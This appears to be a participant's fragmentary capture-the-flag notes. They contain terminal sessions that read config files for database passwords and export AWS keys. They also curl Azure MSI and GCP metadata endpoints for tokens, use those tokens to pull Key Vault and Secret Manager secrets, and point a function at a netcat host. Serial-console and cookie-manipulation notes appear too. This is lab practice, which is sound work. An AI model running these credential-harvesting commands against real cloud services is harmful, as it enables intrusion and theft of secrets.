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facebook? SFRIe3MwY2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RjazNyc30=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 a3c0cmRfaD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twitter k0bGx5XzR3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1:SFRIe3MwY2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2:k0bGx5XzR3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3:a3c0cmRfaD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4:RjazNyc30=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SFRIe3MwY2k0bGx5XzR3a3c0cmRfaDRjazNyc30=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"user": "super_admin",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"time": "Thu Nov 03 2022 16:19:43 GMT+0000 (Coordinated Universal Time)",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"userId": 12,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"iat": 1667492383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"user": "super_admin",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"time": "Thu Nov 03 2022 16:19:43 GMT+0000 (Coordinated Universal Time)",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"userId": 12,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"iat": 1667492383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ship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"user": "super_admin",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"time": "Thu Nov 03 2022 16:19:37 GMT+0000 (Coordinated Universal Time)",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"userId": 12,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"iat": 1667492377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 cookieValue = document.cookie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.split(';')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.find((row) =&gt; row.startsWith('user='))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?.split('=')[1];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const value = 'aGFja2luZ19pc19mdW4';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 (cookieValue === value){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passWord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crypto challange answer to problem is when is the next taco tuesday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export AWS_ACCESS_KEY_ID=ASIAWFPTUW2CPUD5KKU6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export AWS_SECRET_ACCESS_KEY=WfLVT5+/ar7JEzeP5F3WLKe7JQhbxDYXkKfciqRc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export AWS_SESSION_TOKEN=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export AWS_REGION=us-east-1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PANTHER_SECRET_ARN=arn:aws:secretsmanager:us-east-1:424102114948:secret:panther-3649deb9-9100-97b4-a4cc-15c5791a17e0-Iv6itT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"UserId": "AROAWFPTUW2CLID4TRYUR:serverless-prey-panther-4259ab66c461",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"Account": "424102114948",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"Arn": "arn:aws:sts::424102114948:assumed-role/panther-lambda-4259ab66c461-role/serverless-prey-panther-4259ab66c461"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cat /var/task/config.json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"database":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"user": "panther_user",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"pass": "HTH{71df7e49-97ef-9f2a-e50e-d894394bbd85}"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"storage":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"bucket": "panther-gupbdrir",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"object": "panther.jpg"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KET --key panther.jpg ~/Downloads/panther.jpg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"AcceptRanges": "bytes",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"LastModified": "2022-10-11T23:14:09+00:00",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"ContentLength": 232424,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"ETag": "\"5902226f4cdda19c04af3b0fae1ba7ea\"",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"ContentType": "binary/octet-stream",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"Metadata": {},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"TagCount":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export COUGAR_STORAGE_ACCOUNT="cougar4xwzvesl"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cat /home/site/wwwroot/appsettings.json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"ConnectionStrings":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"DefaultConnection": "Server=10.42.42.42:8000;uid=cougar_user;pwd=HTH{428f3091-667e-bd63-89a2-5a4ba9d6bc3a}"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"Storage" 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"account" : "cougar4xwzvesl",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"container" : "assets",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"blob" : "cougar.jpg"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MSI_ENDPOINT=http://localhost:8081/msi/token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MSI_SECRET=441E54B031074AA9B303518FCED3CCB0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COUGAR_KEY_VAULT_URL=https://cougar6ule93m8.vault.azure.net/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COUGAR_SECRET_NAME=cougar-0dbdda8f-7eb5-b2a1-47d4-3271032bf969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"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjJaUXBKM1VwYmpBWVhZR2FYRUpsOGxWMFRPSSIsImtpZCI6IjJaUXBKM1VwYmpBWVhZR2FYRUpsOGxWMFRPSSJ9.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.UV9Yj-EodmNgOUX9lIh_hN5VU2PBu-xm3n6tqGJ-GfHs7hTr2Zva7TvFiHr6Ul0eIAYaKHQ4iUuaJ9LFw9m25_1cVnzv7qhY2E2OU1geNkilVtw0xStujpqPEDpUlg4JohvJxo4IoOuN6y31rvZyBda6aquVg5Q9csjxfJTgoZ0TC9Yf0E_lRAdBpfWPexuSTDdkp4PgJH3TcC3wAtuNNWhauCloiOjUouX4vC9CTrIyfHEyeknFUNaf0bQmZ9QFox4RJDgJ1BC6uvwbExI74IvLpk3kicr77YAi3vG2dwfiE-d_hAv9Z-o2rImleYkt7lvilNlogy_rzWp17o7XoQ","expires_on":"11/04/2022 18:31:59 +00:00","resource":"https://storage.azure.com/","token_type":"Bearer","client_id":"34b1dbe2-c982-4a86-872c-3d608745c5cc"}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curl -s -H "Secret: $MSI_SECRET" "$MSI_ENDPOINT?api-version=2017-09-01&amp;resource=https://storage.azure.com/" &amp;&amp; echo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"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjJaUXBKM1VwYmpBWVhZR2FYRUpsOGxWMFRPSSIsImtpZCI6IjJaUXBKM1VwYmpBWVhZR2FYRUpsOGxWMFRPSSJ9.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.UV9Yj-EodmNgOUX9lIh_hN5VU2PBu-xm3n6tqGJ-GfHs7hTr2Zva7TvFiHr6Ul0eIAYaKHQ4iUuaJ9LFw9m25_1cVnzv7qhY2E2OU1geNkilVtw0xStujpqPEDpUlg4JohvJxo4IoOuN6y31rvZyBda6aquVg5Q9csjxfJTgoZ0TC9Yf0E_lRAdBpfWPexuSTDdkp4PgJH3TcC3wAtuNNWhauCloiOjUouX4vC9CTrIyfHEyeknFUNaf0bQmZ9QFox4RJDgJ1BC6uvwbExI74IvLpk3kicr77YAi3vG2dwfiE-d_hAv9Z-o2rImleYkt7lvilNlogy_rzWp17o7XoQ","expires_on":"11/04/2022 18:31:59 +00:00","resource":"https://storage.azure.com/","token_type":"Bearer","client_id":"34b1dbe2-c982-4a86-872c-3d608745c5cc"}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curl -s -H "Secret: $MSI_SECRET" "$MSI_ENDPOINT?api-version=2017-09-01&amp;resource=https://vault.azure.net" &amp;&amp; echo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"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjJaUXBKM1VwYmpBWVhZR2FYRUpsOGxWMFRPSSIsImtpZCI6IjJaUXBKM1VwYmpBWVhZR2FYRUpsOGxWMFRPSSJ9.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.SuFsBUv69yNymabI2W_-PKw_JZaYXOaQQrZh5MFAAjH1MHV--6soZ2O9D7voAO9nhtN8KhCNJiBn8jGPhRVVGVK5L8OJQ1Zoka1jk2RWk7cMUF1cLvl62NSXO7ZCX_Yj1R_o4gi99EiTW3JDTn93pvpGHyed_ApzvEbAe6dbSRgCFse6NPRaXny71glfwsl5lUVCI5PeSCnyRw_VZ-QG_y1Epl8n0C0j7dD00ehobv8aobasZ3DRAh7Tw0l1H2eEtou8RSIldVDhz7YX7X2V5YSwS9z3_wxj82xr3yl10em-Xl2Ydp8BsnHkpqIFGJtU9uBMQTECxZ-L1H8SMZ6xMQ","expires_on":"11/04/2022 18:30:48 +00:00","resource":"https://vault.azure.net","token_type":"Bearer","client_id":"34b1dbe2-c982-4a86-872c-3d608745c5cc"}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export AZURE_STORAGE_TOKEN="eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjJaUXBKM1VwYmpBWVhZR2FYRUpsOGxWMFRPSSIsImtpZCI6IjJaUXBKM1VwYmpBWVhZR2FYRUpsOGxWMFRPSSJ9.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.UV9Yj-EodmNgOUX9lIh_hN5VU2PBu-xm3n6tqGJ-GfHs7hTr2Zva7TvFiHr6Ul0eIAYaKHQ4iUuaJ9LFw9m25_1cVnzv7qhY2E2OU1geNkilVtw0xStujpqPEDpUlg4JohvJxo4IoOuN6y31rvZyBda6aquVg5Q9csjxfJTgoZ0TC9Yf0E_lRAdBpfWPexuSTDdkp4PgJH3TcC3wAtuNNWhauCloiOjUouX4vC9CTrIyfHEyeknFUNaf0bQmZ9QFox4RJDgJ1BC6uvwbExI74IvLpk3kicr77YAi3vG2dwfiE-d_hAv9Z-o2rImleYkt7lvilNlogy_rzWp17o7XoQ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export AZURE_VAULT_TOKEN="eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjJaUXBKM1VwYmpBWVhZR2FYRUpsOGxWMFRPSSIsImtpZCI6IjJaUXBKM1VwYmpBWVhZR2FYRUpsOGxWMFRPSSJ9.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.SuFsBUv69yNymabI2W_-PKw_JZaYXOaQQrZh5MFAAjH1MHV--6soZ2O9D7voAO9nhtN8KhCNJiBn8jGPhRVVGVK5L8OJQ1Zoka1jk2RWk7cMUF1cLvl62NSXO7ZCX_Yj1R_o4gi99EiTW3JDTn93pvpGHyed_ApzvEbAe6dbSRgCFse6NPRaXny71glfwsl5lUVCI5PeSCnyRw_VZ-QG_y1Epl8n0C0j7dD00ehobv8aobasZ3DRAh7Tw0l1H2eEtou8RSIldVDhz7YX7X2V5YSwS9z3_wxj82xr3yl10em-Xl2Ydp8BsnHkpqIFGJtU9uBMQTECxZ-L1H8SMZ6xMQ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export COUGAR_KEY_VAULT_URL="https://cougar6ule93m8.vault.azure.net/"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export COUGAR_SECRET_NAME="cougar-0dbdda8f-7eb5-b2a1-47d4-3271032bf969"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VAULT_TOKEN" "${COUGAR_KEY_VAULT_URL}secrets/$COUGAR_SECRET_NAME?api-version=7.0" | jq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"value": "HTH{eed15a35-7095-85c8-0ecf-357f39e41e8f}",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"contentType": "",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"id": "https://cougar6ule93m8.vault.azure.net/secrets/cougar-0dbdda8f-7eb5-b2a1-47d4-3271032bf969/554d93d952954f03a9d6aa12384dec6b",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"attributes":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"enabled": true,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"created": 1665526885,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"updated": 1665526885,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"recoveryLevel": "Recoverable+Purgeable"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"tags": {}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katiework@katiework-HP-ZBook-15-G5:~$  curl -s -H "Authorization: Bearer $AZURE_VAULT_TOKEN" "${COUGAR_KEY_VAULT_URL}secrets/$COUGAR_SECRET_NAME?api-version=7.0" | jq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"value": "HTH{eed15a35-7095-85c8-0ecf-357f39e41e8f}",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"contentType": "",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"id": "https://cougar6ule93m8.vault.azure.net/secrets/cougar-0dbdda8f-7eb5-b2a1-47d4-3271032bf969/554d93d952954f03a9d6aa12384dec6b",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"attributes":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"enabled": true,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"created": 1665526885,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"updated": 1665526885,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"recoveryLevel": "Recoverable+Purgeable"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"tags": {}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katiework@katiework-HP-ZBook-15-G5:~$ export COUGAR_STORAGE_ACCOUNT="cougar4xwzvesl"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katiework@katiework-HP-ZBook-15-G5:~$ curl --head -H "x-ms-version: 2017-11-09" -H "Authorization: Bearer $AZURE_STORAGE_TOKEN" "https://$COUGAR_STORAGE_ACCOUNT.blob.core.windows.net/assets/cougar.jpg"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Content-Length: 47081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Content-Type: application/octet-stream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Last-Modified: Tue, 11 Oct 2022 22:18:47 GMT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Accept-Ranges: bytes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ETag: "0x8DAABD6913CCF80"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Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0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x-ms-request-id: cdf1f881-301e-0007-74b4-efc05e000000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x-ms-version: 2017-11-09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x-ms-meta-Flag: HTH{97362bdd-3a2a-c18e-56fb-499d861e0b4b}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x-ms-creation-time: Tue, 11 Oct 2022 22:18:46 GMT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x-ms-lease-status: unlocked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x-ms-lease-state: available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x-ms-blob-type: BlockBlob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x-ms-server-encrypted: true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x-ms-access-tier: Hot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x-ms-access-tier-inferred: true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Date: Thu, 03 Nov 2022 18:42:49 GMT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curl -H "X-API-Key: $CHEETAH_API_KEY" "$CHEETAH_FUNCTION_URL?host=$NC_HOST&amp;port=$NC_PORT"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Server configurations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host: "10.42.42.42"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port: 8000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Database credentials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user: "cheetah_user"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pass: "HTH{f43d136b-7bbf-a5a4-f414-481071e83f0e}"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Storage bucket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gcs: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bucket: "cheetah-1c504e5f-dfa9-f266-4cb7-7a6d2f521e09"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object: "cheetah.jpg"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CHEETAH_SECRET_NAME=cheetah-c5afe051-dc0e-34e0-df4d-b65be7bd6e7b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CHEETAH_PROJECT_ID=hth-2022-nov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curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token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"access_token":"ya29.c.b0AUFJQsHZezDEkdmu2YPp1r4lvRlT0PPbZZ0VvBFqWz-07o0VYYQ8WYhDc1ckNniBaAUE8pW6yci0HfBlsw1Y9rkelD33wgZ0dC0lPWchwOdllR3p4UFYL5iHsfT4941CwimqhNFTfEf3FjhBgBixuZrvkyXzcZnzUVawaBptQp7GU3Y9aEVWkBJXvmCYfSnNYIf-PQquJpDiZGj1mF-RYLwyuRi0IcJjSHQnf0HKxGl-cKmv_Eey5oWJ7BegidZsEJr4bIepxycKPv9a9pfxi821-Lg-uuU02W1LlLPTw1QxUkVWYi9F5XwZ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,"expires_in":1799,"token_type":"Bearer"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export GCP_TOKEN="ya29.c.b0AUFJQsHZezDEkdmu2YPp1r4lvRlT0PPbZZ0VvBFqWz-07o0VYYQ8WYhDc1ckNniBaAUE8pW6yci0HfBlsw1Y9rkelD33wgZ0dC0lPWchwOdllR3p4UFYL5iHsfT4941CwimqhNFTfEf3FjhBgBixuZrvkyXzcZnzUVawaBptQp7GU3Y9aEVWkBJXvmCYfSnNYIf-PQquJpDiZGj1mF-RYLwyuRi0IcJjSHQnf0HKxGl-cKmv_Eey5oWJ7BegidZsEJr4bIepxycKPv9a9pfxi821-Lg-uuU02W1LlLPTw1QxUkVWYi9F5XwZ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export CHEETAH_PROJECT_ID="hth-2022-nov"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export CHEETAH_SECRET_NAME="cheetah-c5afe051-dc0e-34e0-df4d-b65be7bd6e7b"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curl -s -H "Authorization: Bearer $GCP_TOKEN" https://secretmanager.googleapis.com/v1beta1/projects/$CHEETAH_PROJECT_ID/secrets/$CHEETAH_SECRET_NAME/versions/latest:access | jq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"name": "projects/686268255297/secrets/cheetah-c5afe051-dc0e-34e0-df4d-b65be7bd6e7b/versions/1",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"payload":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"data": "SFRIezE4OTcwMTZjLWVhNGYtMTA4YS1mODM2LWI1YWFmOGQyYzE3Yn0="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export GCP_BUCKET="cheetah-1c504e5f-dfa9-f266-4cb7-7a6d2f521e09"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time_continues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time_counts_wishes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time_controls_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HTH{time_ca}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 HTH{rtfm}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 HTH{listin_files}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 HTH{i_see_hidden_files}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5 HTH{listin_secrets}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6 HTH{reading_files_like_pro}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7 HTH{i_see_file_formats}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8 HTH{existential_ctf_challenges}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time brings wishes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taking it all back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time will bring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000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esp-wroom-02d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datasheet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https://www.espressif.com/sites/default/files/documentation/esp-wroom-02u_esp-wroom-02d_datasheet_en.pdf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io0 gipo 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take to grownd during power up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use to read and write firtmware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uart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esptool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ftdi device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21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19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only_time_will_tell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this is not my wish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taking it all back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time_will set free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time will male right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direction 2&amp;3 are cookie manipuation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6th directory triverse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192.168.4.2 dev wlp0s20f3 lladdr c8:e2:65:c3:34:49 STALE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192.168.4.1 dev wlp0s20f3 lladdr ca:c9:a3:4a:2e:14 REACHABLE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fe80::895d:3c47:21fe:85f0 dev wlp0s20f3 lladdr c8:e2:65:c3:34:49 STALE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HTH{ROBOTS_VS_PIRATES}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HTH{S0CK3T_INSP3CTION}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HTH{SLOTH_LIKES_ROCKY_ROAD}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HTH{CONSOLE_LOOT}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User-agent: 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Disallow: /data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Disallow: /messageinabottle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Disallow: HTH{R0B0TS_VS_P1RATES}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katiework@katiework-HP-ZBook-15-G5:/dev$ ttyUSB0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ttyUSB0: command not found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katiework@katiework-HP-ZBook-15-G5:/dev$ /ttyUSB0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bash: /ttyUSB0: No such file or directory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katiework@katiework-HP-ZBook-15-G5:/dev$ cd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katiework@katiework-HP-ZBook-15-G5:~$ ls /dev/ttyUSB0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/dev/ttyUSB0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katiework@katiework-HP-ZBook-15-G5:~$ picocom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No port given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Run with '--help'.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katiework@katiework-HP-ZBook-15-G5:~$ picocom /dev/ttyUSB0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picocom v3.1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port is    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: /dev/ttyUSB0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flowcontrol</w:t>
        <w:tab/>
        <w:t xml:space="preserve">: none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baudrate is</w:t>
        <w:tab/>
        <w:t xml:space="preserve">: 9600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parity is  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: none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databits are   : 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stopbits are   :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escape is  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: C-a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local echo is  : no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noinit is  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: no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noreset is </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: no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hangup is  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: no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nolock is  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: no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send_cmd is</w:t>
        <w:tab/>
        <w:t xml:space="preserve">: sz -vv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receive_cmd is : rz -vv -E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imap is    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">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omap is    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">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emap is    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: crcrlf,delbs,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logfile is </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: none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initstring </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: none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exit_after is  : not set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exit is    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: no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Type [C-a] [C-h] to see available commands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Terminal ready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Terminating...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Thanks for using picocom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katiework@katiework-HP-ZBook-15-G5:~$ picocom /dev/ttyUSB0 -b 115200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picocom v3.1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port is    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: /dev/ttyUSB0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flowcontrol</w:t>
        <w:tab/>
        <w:t xml:space="preserve">: none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baudrate is</w:t>
        <w:tab/>
        <w:t xml:space="preserve">: 115200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parity is  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: none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databits are   : 8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stopbits are   : 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escape is  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: C-a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local echo is  : no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noinit is  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: no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noreset is </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: no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hangup is  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: no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nolock is  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: no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send_cmd is</w:t>
        <w:tab/>
        <w:t xml:space="preserve">: sz -vv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receive_cmd is : rz -vv -E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imap is    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">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omap is    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">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emap is    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: crcrlf,delbs,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logfile is </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: none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initstring </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: none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exit_after is  : not set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exit is    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">: no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Type [C-a] [C-h] to see available commands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Terminal ready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WiFi SSID: SkeletonKey-53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Wifi Password: oneeyedwilly136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Goonies Network Established...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192.168.4.1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MDNS responder started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HTTP server started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WebSocket started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.... .- ..(.-) .- --- -. -.-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 A I A O N K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... .-.. .---- -. -..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.../.-../.-.../../.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.../.-../.----/-./-..-/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H L I 1 N X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